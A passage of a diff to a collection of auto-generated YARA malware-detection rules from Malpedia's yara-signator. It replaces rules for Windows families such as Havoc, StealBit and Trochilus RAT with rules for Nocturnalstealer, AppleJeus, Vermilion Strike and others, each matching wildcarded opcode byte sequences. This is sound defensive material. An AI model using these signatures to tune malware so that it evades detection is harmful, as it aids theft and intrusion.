-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinyfluff_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.evilgrab_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "e68e7d6c227d4701d78eb91cd8fa16d542e11d322177ea0064fd63e81ec16ac3"
+		logic_hash = "b41ba72c13396de6441cf8d00725c98522c9e1b32d509c53ffe738d9f7f30c83"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137450,32 +137987,32 @@ rule MALPEDIA_Win_Tinyfluff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 51 e8???????? 83c408 8b54247c 33c0 }
-		$sequence_1 = { 8a5de3 8b049550704100 885c012e 8b049550704100 804c012d04 46 }
-		$sequence_2 = { 8b04bd50704100 f644032801 7444 837c0318ff 743d e8???????? }
-		$sequence_3 = { 0f876d010000 52 51 e8???????? 83c408 33c0 }
-		$sequence_4 = { 83e03f 6bc838 894de0 8b049d50704100 }
-		$sequence_5 = { 6af6 ff15???????? 8b04bd50704100 834c0318ff 33c0 eb16 }
-		$sequence_6 = { 8b4c2450 8d145502000000 8bc1 81fa00100000 }
-		$sequence_7 = { 57 8d3c85506d4100 8b07 83ceff 3bc6 742b }
-		$sequence_8 = { e8???????? 8b404c 83b8a800000000 750e 8b04bd50704100 807c302900 }
-		$sequence_9 = { 8b4c2468 8d145502000000 8bc1 81fa00100000 7214 8b49fc }
+		$sequence_0 = { 57 8b4324 8d0c40 c1e105 03c8 8d1488 8b4328 }
+		$sequence_1 = { ffd6 83c408 eb06 8b35???????? 8d8c2484030000 68???????? 51 }
+		$sequence_2 = { ff15???????? 89b338050000 897308 897304 89730c bf3f000000 }
+		$sequence_3 = { 6a00 6a01 ff15???????? 8bf8 897dec 85ff }
+		$sequence_4 = { ebb3 8b75c8 8b4e10 51 e8???????? c74610ffffffff 8b45e8 }
+		$sequence_5 = { ff15???????? 83c40c ff8510ebffff 47 ebba 33f6 89b5d8e4ffff }
+		$sequence_6 = { e9???????? 8d8540fcffff 50 8d8d48fdffff 51 8d9548feffff 52 }
+		$sequence_7 = { ffd3 8b4628 50 ffd5 8b462c 85c0 }
+		$sequence_8 = { ffd7 8b442418 50 6a40 ff15???????? 8b542418 8d4c2420 }
+		$sequence_9 = { c685f0efffffd1 68???????? 8d8df1efffff 51 ff15???????? 83c408 8d95f0efffff }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Keyhole_Auto : FILE
+rule MALPEDIA_Win_Zenar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1776d34a-8ed1-5870-82db-2a2698f47369"
+		id = "911998a5-168a-5bc2-9a82-e2c3fffdd44c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyhole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.keyhole_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zenar_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "64c3a1f6c6135646d67c8ef7bc09175e7e75133412ea28a0c20d12643fea552c"
+		logic_hash = "e884fb88ff5222c3dce5f2029617037692e70cee36f52d500814f26a83ec50e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137489,32 +138026,32 @@ rule MALPEDIA_Win_Keyhole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5b 8bc7 5f 5e 83c40c c3 6a05 }
-		$sequence_1 = { 5f c3 56 6a00 ffd3 50 ff15???????? }
-		$sequence_2 = { 25ff030000 0fbf8445a01c0000 8944242c 85c0 0f889b000000 8bc8 }
-		$sequence_3 = { f3ab 8bcb 83e103 f3aa 8b442414 8a4c2413 eb18 }
-		$sequence_4 = { 0f57c0 c1e208 0bd0 660fd6442454 8bc6 c1e818 0bd0 }
-		$sequence_5 = { 8b4304 6a00 89442421 8d442418 6a0d 50 ff7308 }
-		$sequence_6 = { c3 57 8b7904 85ff 7404 8b01 8907 }
-		$sequence_7 = { 68???????? 53 ffd7 5e 5d 5f }
-		$sequence_8 = { 8d7c242c 8bca 03fd 8bd9 c1e902 6601944612860000 }
-		$sequence_9 = { c1eb10 8b442410 c1e208 0fb6c0 0bd0 0fb6c3 }
+		$sequence_0 = { 6bc838 8b049598ae4300 f644082801 740b 56 e8???????? }
+		$sequence_1 = { b9???????? c605????????e6 8935???????? 8935???????? e8???????? 8b45ec 8935???????? }
+		$sequence_2 = { 8b07 33c9 66890c50 8bc7 397714 7202 8b07 }
+		$sequence_3 = { c745fc02000000 e8???????? 894604 83c408 8b45ec }
+		$sequence_4 = { c9 c21400 55 8bec 83ec10 8d45f8 53 }
+		$sequence_5 = { 51 50 6a30 68???????? }
+		$sequence_6 = { c20400 55 8bec 8d4178 8b4d08 50 }
+		$sequence_7 = { e8???????? 8b45fc 83c40c 895e10 894614 }
+		$sequence_8 = { 6bf638 8b0c8d98ae4300 80643128fd 5f 5e c9 }
+		$sequence_9 = { 8b4de0 8845f3 85c9 7411 8b01 ff5008 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 519168
 }
-rule MALPEDIA_Win_Homefry_Auto : FILE
+rule MALPEDIA_Win_Mortalkombat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7df805f2-9572-5d41-ae6a-f57f653d9d31"
+		id = "5eb05f16-7725-598c-b79d-b9528e7759ee"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.homefry_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mortalkombat_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "7ca7431c5f68652158a7da10d411e05a72b05761bc09d487931a01e83f98c509"
+		logic_hash = "44f11e1302873d7b8732182da9f21833a01d02537c804d5a52bde5d4fbe797c8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137528,32 +138065,32 @@ rule MALPEDIA_Win_Homefry_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4863d5 4803d0 488b05???????? 488917 48630a }
-		$sequence_1 = { 740f 8bcf 4803cd 7408 488bd6 }
-		$sequence_2 = { 740f 8bcf 4803cd 7408 }
-		$sequence_3 = { 0f880a010000 488b0d???????? 488d842480000000 458d4e04 488b09 4c8d442470 }
-		$sequence_4 = { c705????????94000000 ff15???????? 33d2 8d4a02 ff15???????? 488bd8 }
-		$sequence_5 = { e8???????? 84c0 0f8418010000 48833d????????00 48899c24a0000000 4889b424a8000000 7471 }
-		$sequence_6 = { ff15???????? 488bcb ff15???????? 4881c420040000 }
-		$sequence_7 = { 486305???????? 4c890d???????? 48630c18 4c03c3 40883a }
-		$sequence_8 = { e8???????? eb05 e8???????? 84c0 7511 488d0ddd180000 }
-		$sequence_9 = { 483bdd 72d0 488bcf ff15???????? 33c0 488b5c2430 488b6c2438 }
+		$sequence_0 = { 8bec 83c4a4 c745d030000000 c745d403200000 }
+		$sequence_1 = { 68???????? e8???????? 83c710 6a04 57 }
+		$sequence_2 = { e8???????? eb14 6a10 68???????? 68???????? }
+		$sequence_3 = { 0f85a6010000 833d????????00 7506 ff0d???????? 68???????? }
+		$sequence_4 = { 0fca 890d???????? 8915???????? 8b4808 8b500c 0fc9 }
+		$sequence_5 = { 4c 006800 0200 0068b9 6640 00684d 214000 }
+		$sequence_6 = { 8d85e8feffff 50 68???????? e8???????? 85c0 0f8419030000 }
+		$sequence_7 = { ff7508 68???????? e8???????? eb1d 68f5010000 }
+		$sequence_8 = { 6a01 6800000080 68???????? e8???????? 8945fc }
+		$sequence_9 = { 6640 00684d 214000 e8???????? }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 1224704
 }
-rule MALPEDIA_Win_Havoc_Auto : FILE
+rule MALPEDIA_Win_Eyservice_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e49338ce-e5b7-5533-8149-1afd3e757884"
+		id = "589ff6f4-47d8-50d3-88a8-cdfa19ccb778"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.havoc_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.eyservice_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "b1a82d03442de3dfd518e07ebf86436482be6a35139d23b15b46564ec29f5896"
+		logic_hash = "9d569b1b4aa245beb2c0397a0750c9c20deb66d33a0ec235ace59e3da184607d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137567,32 +138104,32 @@ rule MALPEDIA_Win_Havoc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7856 488b842488000000 488bb42488000000 4531c9 }
-		$sequence_1 = { 31c0 80bc245e01000001 0f95c0 83c008 }
-		$sequence_2 = { 49c1e504 4c01e9 4c8b01 4d85c0 }
-		$sequence_3 = { 89f8 5b 5e 5f 5d 415c }
-		$sequence_4 = { 4181c0ff0f0000 488b00 4181e000f0ffff 4889542420 4889ca 4883c9ff }
-		$sequence_5 = { 6bc018 44898424c4000000 48c78424c800000001001800 f3a5 83c01f }
-		$sequence_6 = { 85f6 0f95c0 4883c9ff 01c0 8944244c }
-		$sequence_7 = { 4d8b0c3a 48c1e204 4b8d0c01 8b01 49034412f0 4b8d540104 }
-		$sequence_8 = { 4531c0 31d2 e8???????? 4883c428 }
-		$sequence_9 = { 85c0 7856 488b842488000000 488bb42488000000 4531c9 4531c0 488b8c24a0000000 }
+		$sequence_0 = { 6aff 50 ff15???????? 85c0 757e 8b4624 }
+		$sequence_1 = { e8???????? 83beac01000001 750d 8b8eec000000 51 }
+		$sequence_2 = { e8???????? 83c404 8bc8 e8???????? 8bf0 8bce e8???????? }
+		$sequence_3 = { 51 668944244c ffd5 668b542446 8b4c2442 668954241e 8b542446 }
+		$sequence_4 = { 0fbf8a883b4100 0fbf0c4dea3f4100 3bc8 7433 0fbf82c03c4100 3d94000000 7c0a }
+		$sequence_5 = { 7509 b86e000000 5e c20800 8b06 034604 }
+		$sequence_6 = { 894614 ff86c0000000 83bec000000001 57 7513 ff15???????? 56 }
+		$sequence_7 = { ff15???????? 8bc7 5f 8b8c246c020000 5b 5e }
+		$sequence_8 = { 7426 8b4610 2bc7 c1f802 8d0c8500000000 8d2c11 }
+		$sequence_9 = { 8b7704 2bf0 7424 3bf1 7602 8bf1 }
 
 	condition:
-		7 of them and filesize < 164864
+		7 of them and filesize < 452608
 }
-rule MALPEDIA_Win_Green_Dispenser_Auto : FILE
+rule MALPEDIA_Win_Powerloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "84ada711-0fc6-5325-8121-c6b1b7bed827"
+		id = "a8055861-0eb8-5c59-854d-6c838621a56f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.green_dispenser"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.green_dispenser_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powerloader_auto.yar#L1-L106"
 		license_url = "N/A"
-		logic_hash = "871957685fdf3c7f3a313c97f44c2b4e50a7c0cccb8e8255b3b477d16c388ef7"
+		logic_hash = "49acbf4818653ec3c37c64918d36c8fbd597bf611facefb0fe7af9324dfdd104"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137606,32 +138143,32 @@ rule MALPEDIA_Win_Green_Dispenser_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c60084 c6043884 03c7 03c7 b901000000 c60084 c6043884 }
-		$sequence_1 = { 51 8bd7 8bc8 e8???????? 83c404 85c0 0f8503020000 }
-		$sequence_2 = { c745fc00000000 897dc0 c745c400000000 e8???????? 8bcb e8???????? 6a01 }
-		$sequence_3 = { 53 8b5d14 56 8b7508 57 8b7d0c 81ff81000000 }
-		$sequence_4 = { c785d0fcffff0f000000 c785ccfcffff00000000 c685bcfcffff00 83bd64fdffff10 720e ffb550fdffff }
-		$sequence_5 = { 51 53 8d048a 56 8b34c510e54200 57 8b3cc514e54200 }
-		$sequence_6 = { 8b049d50aa4500 8064302480 837d0800 5f 5e 5b 7507 }
-		$sequence_7 = { 8bce e8???????? 8bf0 8b45fc ff7004 e8???????? ff75fc }
-		$sequence_8 = { e8???????? 8b45f8 83c40c 03fb 03f0 ff4df4 }
-		$sequence_9 = { 894c240c 84c0 7404 660f57c4 8b7c2414 c644242025 }
+		$sequence_0 = { 33d2 ff15???????? 83f81f 7323 }
+		$sequence_1 = { e8???????? eb22 33c9 66666666660f1f840000000000 }
+		$sequence_2 = { 8bf2 32db e8???????? 3bc7 7349 }
+		$sequence_3 = { 7441 8b5c2430 85db 741d }
+		$sequence_4 = { 32db e8???????? 3bc7 7349 }
+		$sequence_5 = { e8???????? 0fb6d8 84c0 7514 }
+		$sequence_6 = { ff15???????? 83f81f 7323 ff15???????? }
+		$sequence_7 = { e8???????? 0fb6d8 85ff 740c }
+		$sequence_8 = { e8???????? 0fb6d8 84c0 7514 ff15???????? }
+		$sequence_9 = { 33d2 c605????????00 e8???????? 0fb6c3 }
 
 	condition:
-		7 of them and filesize < 838656
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Trochilus_Rat_Auto : FILE
+rule MALPEDIA_Win_Applejeus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff7e3b17-5233-56c0-8cf9-b500183b9183"
+		id = "a96317b4-bd12-5fff-be15-1f3be0768b07"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.trochilus_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.applejeus_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "28ef93658f73bc964eedcf05592130cfb5b477accac6e59366138836c637cdc2"
+		logic_hash = "c4add26ff07d848a7e42bd144b883577737cbad9e67d1f7f5e019bb64cfa0808"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137645,32 +138182,32 @@ rule MALPEDIA_Win_Trochilus_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { bb00010000 e8???????? 85c0 7452 8bf0 eb2d 8b4d08 }
-		$sequence_1 = { 0f84e0000000 399d2cffffff 0f84d4000000 57 56 68???????? 53 }
-		$sequence_2 = { 8b01 8d55fc 52 ff7510 ff750c ff5030 6a00 }
-		$sequence_3 = { 8975e0 8db1f8190110 8975e4 eb2b 8a4601 84c0 7429 }
-		$sequence_4 = { e8???????? 89442410 85c0 0f849e000000 8bf8 8d4728 }
-		$sequence_5 = { e8???????? c70009000000 e8???????? ebd5 8bc8 c1f905 8b0c8d409a8100 }
-		$sequence_6 = { 57 ff15???????? 33c0 5f 5d c20400 55 }
-		$sequence_7 = { 85c0 7414 53 ff15???????? 8b4dfc 8bc6 e8???????? }
-		$sequence_8 = { 83630400 832300 8b4508 894308 8b450c }
-		$sequence_9 = { 8d8534ffffff 50 8d8d7cffffff e8???????? 397df0 764d 837df408 }
+		$sequence_0 = { 8885b3fbffff 8b8598fbffff 0418 83f059 8885b4fbffff 8b8598fbffff 0419 }
+		$sequence_1 = { 8b0f 8901 ffd6 8b4f04 0f57c0 660fd645e0 c745e000000000 }
+		$sequence_2 = { 8bce ff10 6a04 56 e8???????? 6a04 ff7598 }
+		$sequence_3 = { 8b85e4edffff c645fc0b 8b7f28 89bd40eeffff 8dbdf0efffff 8b7024 8b5020 }
+		$sequence_4 = { c685a1e7ffff43 c685a2e7ffff52 c685a3e7ffff66 8a8570e7ffff c685a4e7ffff00 0f1f4000 }
+		$sequence_5 = { 042f 83f06c 88852ffeffff 8b85fcfdffff 0430 83f04d 888530feffff }
+		$sequence_6 = { ffd3 8b4d08 83c410 894104 8b450c 5f 5e }
+		$sequence_7 = { 8955c4 8b461c 8945d0 e8???????? 0f1045bc 8b4dd8 83c408 }
+		$sequence_8 = { e8???????? 50 8d4de0 e8???????? 8d45e0 50 8d8d9cfeffff }
+		$sequence_9 = { 8885c9f6ffff 8b8560f6ffff 0466 83f053 8885caf6ffff 8b8560f6ffff 0467 }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 1245184
 }
-rule MALPEDIA_Win_Stealbit_Auto : FILE
+rule MALPEDIA_Win_Vermilion_Strike_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "64063c47-cdf5-5614-a83c-80647057336b"
+		id = "0cca6268-ed67-5b5d-8d1e-c4b1c4763f8b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stealbit_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vermilion_strike_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "744b036a3f78a167f444b112707f7176ea1e1a362d653a3e610f6fa57bd7d98b"
+		logic_hash = "ffc8a6cd25f24a5bbb4ecf81a74aa2be97f9696d5656c7bc8cb3391d29c69c5d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137684,32 +138221,32 @@ rule MALPEDIA_Win_Stealbit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 58 6a74 668945ea 58 6a65 668945ec 58 }
-		$sequence_1 = { e8???????? 8bcf 894508 e8???????? 8b4d08 33c8 741f }
-		$sequence_2 = { 884105 e8???????? 6a03 6a4f 884106 e8???????? }
-		$sequence_3 = { e8???????? 40 50 8b54240c }
-		$sequence_4 = { 42 83fa46 72ed 8bc6 5e c3 55 }
-		$sequence_5 = { 6a20 5e 56 884106 e8???????? 6a04 }
-		$sequence_6 = { 59 85c0 0f840d030000 57 8d9574feffff 8bce }
-		$sequence_7 = { 58 6a6f 6689856cffffff 58 6a67 6689856effffff 66898d68ffffff }
-		$sequence_8 = { e8???????? 6689421a 0fb705???????? 50 e8???????? 6689421c 0fb705???????? }
-		$sequence_9 = { e8???????? 33c0 59 40 eb07 e8???????? 33c0 }
+		$sequence_0 = { 03c1 a3???????? e9???????? 8b5608 42 52 e8???????? }
+		$sequence_1 = { 8b6f04 eb03 8d6f04 8b15???????? 8b7f1c 6880ee3600 }
+		$sequence_2 = { 68???????? c644241806 e8???????? 68???????? c644241807 e8???????? b8???????? }
+		$sequence_3 = { 50 c744241001000000 e8???????? 8b8c24c4000000 8b9424c0000000 51 52 }
+		$sequence_4 = { 2bf8 8b4c2418 57 8db424fc000000 8d942418010000 e8???????? }
+		$sequence_5 = { 83c508 55 e8???????? 83c404 55 8bf0 6a00 }
+		$sequence_6 = { 50 56 eb06 53 68???????? 8d442454 e8???????? }
+		$sequence_7 = { 53 e8???????? 83c404 8d742e08 eb7d 0fb64c3704 0fb6543705 }
+		$sequence_8 = { 8b442420 8b7c2424 3bfb 7544 8b542428 8b5e14 }
+		$sequence_9 = { 750c c705????????01000000 eba9 83f808 75a4 c705????????04000000 eb98 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Lyposit_Auto : FILE
+rule MALPEDIA_Win_Nocturnalstealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a1182ef-14f9-5ae8-9cfb-f5f8b2d96cab"
+		id = "b2ebf655-b369-5222-91b5-1580e525a57e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lyposit_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nocturnalstealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "249026f12880d5f66834071d41f0c2254bacd8b35bc56d04ae3c23c7c93561c7"
+		logic_hash = "2c6b243d35f29c591c5668acf471c8a2107f8e8d4171dce50c484f231af2f2ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137723,32 +138260,32 @@ rule MALPEDIA_Win_Lyposit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0a c645e703 eb04 c645e702 8d7e01 897dd8 c645e300 }
-		$sequence_1 = { 8945e0 56 6a40 ffd7 8945e4 56 ff75e0 }
-		$sequence_2 = { 59 895ddc 395de0 740f 8b45cc 3bc3 }
-		$sequence_3 = { 0f8d42040000 837e04ff 7408 e8???????? 8b450c }
-		$sequence_4 = { 83c410 834dfcff eb91 55 8bec 837d0c10 742c }
-		$sequence_5 = { 53 e8???????? 8bf8 53 e8???????? ff75d0 }
-		$sequence_6 = { c1e804 a801 743b 8b4d10 0fb701 6683f82f }
-		$sequence_7 = { be00040000 6a1e 8945f0 5f bbba000000 c745f440010000 }
-		$sequence_8 = { 395d0c 750b 834dfcff 33c0 e9???????? 391d???????? }
-		$sequence_9 = { 59 e8???????? e2f9 59 43 83e903 }
+		$sequence_0 = { e9???????? 53 c70424e630fe1e 890424 51 e9???????? 81f2150c9f7b }
+		$sequence_1 = { ce f24b 0205???????? d91ca2 ac 97 8c80313ff9c1 }
+		$sequence_2 = { e9???????? 01c6 e9???????? 50 54 e9???????? 01d9 }
+		$sequence_3 = { e9???????? 59 c1ef01 81f7???????? 81cf424a8d6f e9???????? 52 }
+		$sequence_4 = { e9???????? 50 e9???????? 8b2c24 83c404 81e801000000 0f853bffffff }
+		$sequence_5 = { e9???????? f7db 81f3a7b72281 57 bf57bc7f6f 56 e9???????? }
+		$sequence_6 = { ff3424 e9???????? 81e942e2bf7f 01d9 81c142e2bf7f e9???????? 872c24 }
+		$sequence_7 = { e9???????? 01ea 5d e9???????? 29c5 58 332c24 }
+		$sequence_8 = { 89e0 0504000000 83e804 870424 5c 892c24 e9???????? }
+		$sequence_9 = { e9???????? 59 52 89f2 89d0 5a e9???????? }
 
 	condition:
-		7 of them and filesize < 466944
+		7 of them and filesize < 10739712
 }
-rule MALPEDIA_Win_Loup_Auto : FILE
+rule MALPEDIA_Win_Mongall_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2089eb01-8adc-5d71-ab0c-e9de7e386d03"
+		id = "1879a42c-8126-5974-b63b-7f69fc5f6e38"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.loup"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.loup_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mongall"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mongall_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "ecdd5b2ea3515331e17a7116f826dcace78b7e88cf24fcea19298195170a6a4f"
+		logic_hash = "36dcbe2d37d6f65dbb3669c0b2ac6fd765ed6dc11c02d84fddc280c31d04ea56"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137762,32 +138299,32 @@ rule MALPEDIA_Win_Loup_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 85c0 741c 0fb745f4 50 e8???????? }
-		$sequence_1 = { 81781422059319 740c 8b4dfc 81791400409901 7522 e8???????? 8b55fc }
-		$sequence_2 = { 85c0 0f84da000000 8b7dec 8b07 8b7068 }
-		$sequence_3 = { 8b85d0f1ffff 53 56 ff3485647b4100 50 }
-		$sequence_4 = { 68c0d40100 8d4de8 51 682e010000 0fb75508 52 e8???????? }
-		$sequence_5 = { 81f247656e75 b804000000 6bc803 8b440de0 35696e6549 }
-		$sequence_6 = { 8b4df4 84c0 0f84defeffff c745dc01000000 e9???????? 5f 5e }
-		$sequence_7 = { 668945e8 33c0 668945ea c745ee01000000 b804000000 668945ec }
-		$sequence_8 = { b804000000 c1e002 c784055cffffff01000000 8d855cffffff 8945d5 }
-		$sequence_9 = { 8915???????? c705????????01000000 a1???????? 83c802 a3???????? b904000000 c1e100 }
+		$sequence_0 = { 85ff 7e2a 6a20 4e e8???????? 59 }
+		$sequence_1 = { 5e 0fb6c3 5b c9 c3 8bff }
+		$sequence_2 = { c785d0fdffff01000000 8bbdc8fdffff 2bbde0fdffff 2bbdd0fdffff a80c }
+		$sequence_3 = { 56 ff15???????? 8bd8 53 53 6a00 }
+		$sequence_4 = { 2bc2 8bd0 8bc7 8d5801 8a08 }
+		$sequence_5 = { c70694000000 ff15???????? 8b4604 83f804 7519 68???????? 57 }
+		$sequence_6 = { 03c9 03c9 d3e7 33c0 8975f8 }
+		$sequence_7 = { 57 8d3c40 33c9 b03d 33db 897dfc }
+		$sequence_8 = { 6a00 ff15???????? 8bf0 ff15???????? 3db7000000 7524 }
+		$sequence_9 = { 8975f8 ff15???????? 8b5d08 85db 740a 57 }
 
 	condition:
-		7 of them and filesize < 257024
+		7 of them and filesize < 199680
 }
-rule MALPEDIA_Win_Unidentified_100_Auto : FILE
+rule MALPEDIA_Win_Bughatch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e8675cb6-73bb-59b5-91a8-02c6f92da222"
+		id = "7c76d5fd-0852-57e8-98d3-2429c0a26bc6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_100"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_100_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bughatch_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "a4a5162870b4493fc5243e7bd2eeeb85f162da808d7efca293e2e60ad15e324b"
+		logic_hash = "ce23ebcae0b6af11021010314345b92d6fc792734955c495c1529b11609de8c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137801,34 +138338,34 @@ rule MALPEDIA_Win_Unidentified_100_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f8ff 751e 488d8c2490020000 ff15???????? 4889442430 488b4c2430 ff15???????? }
-		$sequence_1 = { 4833c4 4889442428 488d442450 4889442420 4c8b4c2420 4c8b442448 baf4010000 }
-		$sequence_2 = { 48ffc1 eb0f 0fb601 4a0fbe842830730200 4803c8 48ffc7 48ffc1 }
-		$sequence_3 = { 488b4c2470 c6040104 e9???????? 48630424 488b4c2478 0fb60401 }
-		$sequence_4 = { 448b4c2440 4c8d05e7e00100 ba14000000 488d8c2430030000 e8???????? 488d842448030000 4889442428 }
